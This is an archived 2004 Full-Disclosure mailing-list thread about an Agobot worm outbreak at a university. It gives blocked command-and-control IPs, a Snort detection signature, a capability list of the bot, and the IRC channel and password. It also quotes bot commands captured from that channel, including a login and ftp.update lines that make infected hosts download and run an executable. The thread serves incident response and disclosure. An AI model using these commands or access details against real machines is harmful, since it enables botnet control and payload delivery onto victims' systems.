[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [Full-Disclosure] Re: Outbreak of a virus on campus

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: RE: [Full-Disclosure] Re: Outbreak of a virus on campus
From: "David Hale" <ddh@xxxxxxx>
Date: Sun, 25 Apr 2004 02:52:09 -0400 (EDT)

  We have currently blocked connections to port to/from 7000 on the
following hosts:

130.74.82.206
131.234.100.43
193.87.20.31

  This seems to have contained the spread of the worm within our campus. 
The list of hosts was gathered with a snort signature of:

alert tcp $HOME_NET any -> any 7000 (msg:"agobot IRC traffic";
content:"weednet";classtype:bad-unknown; sid:71727; rev:1;)

  Until the block was in place we had shut down around 50 hosts (mainly on
our dorm network) that had been infected with the worm.

  -Dave Hale
   Sr. Security Specialist
   Michigan Technological University

>
> ----- Original Message -----
> From: "Morning Wood"
> Date: Sat, 24 Apr 2004 18:37:31 +0000
> To: mueller@xxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxx
> Subject: RE: [Full-Disclosure] Re: Outbreak of a virus on campus
>
>> phatbot?
>
> This one is yet another agobot. Has long list of useful commands
> (included in the end of posting, if someone is interested...),
> polymorph capability, stealth capability -hides its own process
> in memory and binary from listing, capable of updating itself
> via ftp/http, has list of servers for evaluating connection speed,
> steals cdkeys, sniffs a wire, performs ddos, capable installing
> a proxy, sends spam via aol, can install identd, has LONG list
> various processes to kill (mostly AV, but also regedit and tcpview
> among others), retrievs sysinfo, makes screenshots etc etc etc -
> looks similar to others good household bot's :)
>
> What makes its interesting - its stealth capability and propagation.
> It has following scanning/propagation subroutines:
>
> CScannerBagle
> CScannerBase
> CScannerDCOM
> CScannerDoom
> CScannerDW
> CScannerHTTP
> CScannerNetBios
> CScannerOptix
> CScannerSQL
> CScannerUPNP
> CScannerWKS
>
>
> When worm is started, it connects to irc server
> 193.87.20.31 (irc.weednet.net) port 7000.
> Then it joines to password ptotected channel
> #1337, password is heyho. As channel topic is
> .scan.startall, it accepts command and starts
> right away scanning.
>
> I took my trusty irc client and joined to that
> channel by myself. Right away admin gave me those
> commands:
>
> <admin> .login stebo jamesbond007 -s
> <admin> .ftp.update ftp://ftp:bla@xxxxxxxxxxxxxxxxxxx/incoming/dt.exe
> %TEMP%\xgf.exeBLAOR12
> <admin> .scan.stop
> <admin> .ftp.update ftp://ftp:bla@xxxxxxxxxxxxxxxxxxx/incoming/dt.exe
> c:\xgf.exe BLAOR12
>
> seems like my 'bot' version was too old :)
>
> have fun :)
>
> W.
>
>
> -----------------------
> commands and parameters
> all commands starts with . (dot)
>
>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- RE: [Full-Disclosure] Re: Outbreak of a virus on campus
  - From: David Hale

References:
- RE: [Full-Disclosure] Re: Outbreak of a virus on campus
  - From: Willem Koenings

Prev by Date: Re: [Full-Disclosure] Looking for BKDR_IRCFLOOD.X
Next by Date: RE: [Full-Disclosure] Firewall solution for Windows 2003 Server
Previous by thread: RE: [Full-Disclosure] Re: Outbreak of a virus on campus
Next by thread: RE: [Full-Disclosure] Re: Outbreak of a virus on campus
Index(es):
- Date
- Thread